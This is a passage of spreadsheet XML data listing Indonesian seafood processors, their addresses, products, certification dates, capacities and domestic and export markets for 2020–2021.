    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22524"/>
    <x v="700"/>
    <s v="PT. PUTRA CITRA HASIL LAUT"/>
    <s v="Jl. Blanak Blok A No.10, Komplek Pelabuhan PPP Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Bonito, Tongkol, Kembung, Marlin, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Semarang, Kabupaten Kendal, Kabupaten Batang, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kota Probolinggo, Kota Surabaya"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22525"/>
    <x v="700"/>
    <s v="PT. PUTRA CITRA HASIL LAUT"/>
    <s v="Jl. Blanak Blok A No.10, Komplek Pelabuhan PPP Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Pati, Kabupaten Semarang, Kabupaten Kendal, Kabupaten Batang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kota Surabaya"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22526"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Rajungan Kaleng"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="52000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22527"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kaleng"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="482400"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22528"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Kaleng"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="192000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22529"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="355200"/>
    <m/>
    <s v="South Africa"/>
  </r>
  <r>
    <n v="22530"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Kaleng"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="148000"/>
    <m/>
    <s v="Spain"/>
  </r>
  <r>
    <n v="22531"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22532"/>
    <x v="701"/>
    <s v="PT. ENERGI PULAU SUJA"/>
    <s v="Jl. Line Pipa, Dusun A, Kel. Paloh Punti, Kec. Muara Satu, Kota Lhokseumawe&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Lobster Hidup"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22533"/>
    <x v="701"/>
    <s v="PT. ENERGI PULAU SUJA"/>
    <s v="Jl. Line Pipa, Dusun A, Kel. Paloh Punti, Kec. Muara Satu, Kota Lhokseumawe&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22534"/>
    <x v="701"/>
    <s v="PT. ENERGI PULAU SUJA"/>
    <s v="Jl. Line Pipa, Dusun A, Kel. Paloh Punti, Kec. Muara Satu, Kota Lhokseumawe&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Kering"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22535"/>
    <x v="702"/>
    <s v="DAPUR SAUJA"/>
    <s v="Tridaya Nuansa Indah, Jl. Kelapa Gading Raya EA.9 No.12A, Kel. Sumber Jaya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tekwan"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="21000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22536"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22537"/>
    <x v="703"/>
    <s v="CV. SOON HO TBA"/>
    <s v="Jl. Tanjung Berombang, Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22538"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="600"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22539"/>
    <x v="616"/>
    <s v="UD. PUTRA ANELA MANDIRI"/>
    <s v="Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lamongan"/>
    <m/>
  </r>
  <r>
    <n v="22540"/>
    <x v="616"/>
    <s v="UD. PUTRA ANELA MANDIRI"/>
    <s v="Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lamongan"/>
    <m/>
  </r>
  <r>
    <n v="22542"/>
    <x v="704"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Kawasan Industri Graha Permai Balaraja, Jl. Raya Serang KM 28, Kel. Tobat, Kec. Balaraja, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="1878000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="22543"/>
    <x v="704"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Kawasan Industri Graha Permai Balaraja, Jl. Raya Serang KM 28, Kel. Tobat, Kec. Balaraja, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="119000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="22544"/>
    <x v="704"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Kawasan Industri Graha Permai Balaraja, Jl. Raya Serang KM 28, Kel. Tobat, Kec. Balaraja, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="22545"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Batik Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22546"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bekicot Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="Canada, South Africa, United States"/>
  </r>
  <r>
    <n v="22547"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Belgium, South Africa, United States"/>
  </r>
  <r>
    <n v="22548"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22549"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22550"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="Belgium, Canada, Germany, Netherlands, United States"/>
  </r>
  <r>
    <n v="22551"/>
    <x v="705"/>
    <s v="PT, REX CANNING"/>
    <s v="Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng dan Pouch"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="22552"/>
    <x v="706"/>
    <s v="PT. HOI HING INVESTMENT"/>
    <s v="Jl. Raya Pakal No.71, Kel. Pakal, Kec. Pakal, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="232471"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22553"/>
    <x v="706"/>
    <s v="PT. HOI HING INVESTMENT"/>
    <s v="Jl. Raya Pakal No.71, Kel. Pakal, Kec. Pakal, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="1788887"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22554"/>
    <x v="707"/>
    <s v="PT, HARAPAN MUJUR SAMUDERA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Kendari Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Italy, Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22555"/>
    <x v="707"/>
    <s v="PT, HARAPAN MUJUR SAMUDERA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Kendari Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22556"/>
    <x v="707"/>
    <s v="PT, HARAPAN MUJUR SAMUDERA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Kendari Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22557"/>
    <x v="707"/>
    <s v="PT, HARAPAN MUJUR SAMUDERA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Kendari Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="84000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="22559"/>
    <x v="708"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Veteran Madya I No.1 RT 011 RW 003, Kel. Gending, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22561"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22562"/>
    <x v="665"/>
    <s v="PT. SUMBER USAHA NUSANTARA"/>
    <s v="Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22563"/>
    <x v="709"/>
    <s v="PT. PINGAN SEAFOOD PRODUCT MANUFACTURE"/>
    <s v="Jl. Margomulyo 44, Komplek Pergudangan Suri Mulia Permai Blok B No.21, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="500"/>
    <s v="Kota Makassar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="22564"/>
    <x v="709"/>
    <s v="PT. PINGAN SEAFOOD PRODUCT MANUFACTURE"/>
    <s v="Jl. Margomulyo 44, Komplek Pergudangan Suri Mulia Permai Blok B No.21, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="300"/>
    <s v="Kota Makassar"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22565"/>
    <x v="709"/>
    <s v="PT. PINGAN SEAFOOD PRODUCT MANUFACTURE"/>
    <s v="Jl. Margomulyo 44, Komplek Pergudangan Suri Mulia Permai Blok B No.21, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abalone Kering"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="100"/>
    <s v="Kota Makassar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="22566"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22567"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Jahan, Gabus)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="40000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22568"/>
    <x v="609"/>
    <s v="UD. CATHAY INDO CHITIN"/>
    <s v="Dusun Krajan 1 RT 03 RW 05, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kolagen Ikan "/>
    <d v="2020-10-21T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Surabaya"/>
    <s v="Germany, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="22569"/>
    <x v="609"/>
    <s v="UD. CATHAY INDO CHITIN"/>
    <s v="Dusun Krajan 1 RT 03 RW 05, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ossein"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Surabaya"/>
    <s v="Germany, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="22570"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Gabus)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22571"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="6000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22572"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22573"/>
    <x v="711"/>
    <s v="PT. JAYA MITRA SAMUDERA"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor"/>
    <m/>
  </r>
  <r>
    <n v="22574"/>
    <x v="711"/>
    <s v="PT. JAYA MITRA SAMUDERA"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="22575"/>
    <x v="711"/>
    <s v="PT. JAYA MITRA SAMUDERA"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Layur, Bawal, Samge, Selar, Kakap, Ekor Kuning)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="22576"/>
    <x v="711"/>
    <s v="PT. JAYA MITRA SAMUDERA"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Salem, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22577"/>
    <x v="712"/>
    <s v="PT. NAGAMA SAMUDRA"/>
    <s v="Jl. Tukad Punggawa No.238X Lingkungan Banjar Ponjok, Kel. Serangan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Badung"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22579"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Lobster Hidup"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="800"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22580"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Layaran, Selar, Tenggiri)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="14000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22581"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Layaran, Selar, Tenggiri)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22582"/>
    <x v="710"/>
    <s v="PT. KAWAL LAUT JAYA"/>
    <s v="Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="1800"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22584"/>
    <x v="713"/>
    <s v="CV. JESSLYN INDAH LESTARI"/>
    <s v="Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Ikan Demersal Segar (Senangin, Manyung, Kerapu, Bawal, Kakap, Kurau, Barramundi)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22588"/>
    <x v="713"/>
    <s v="CV. JESSLYN INDAH LESTARI"/>
    <s v="Dusun Nirwana RT 10 RW 04, Kel. Sungai Kakap, Kec. Sungai Kakap, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Pontianak"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22591"/>
    <x v="713"/>
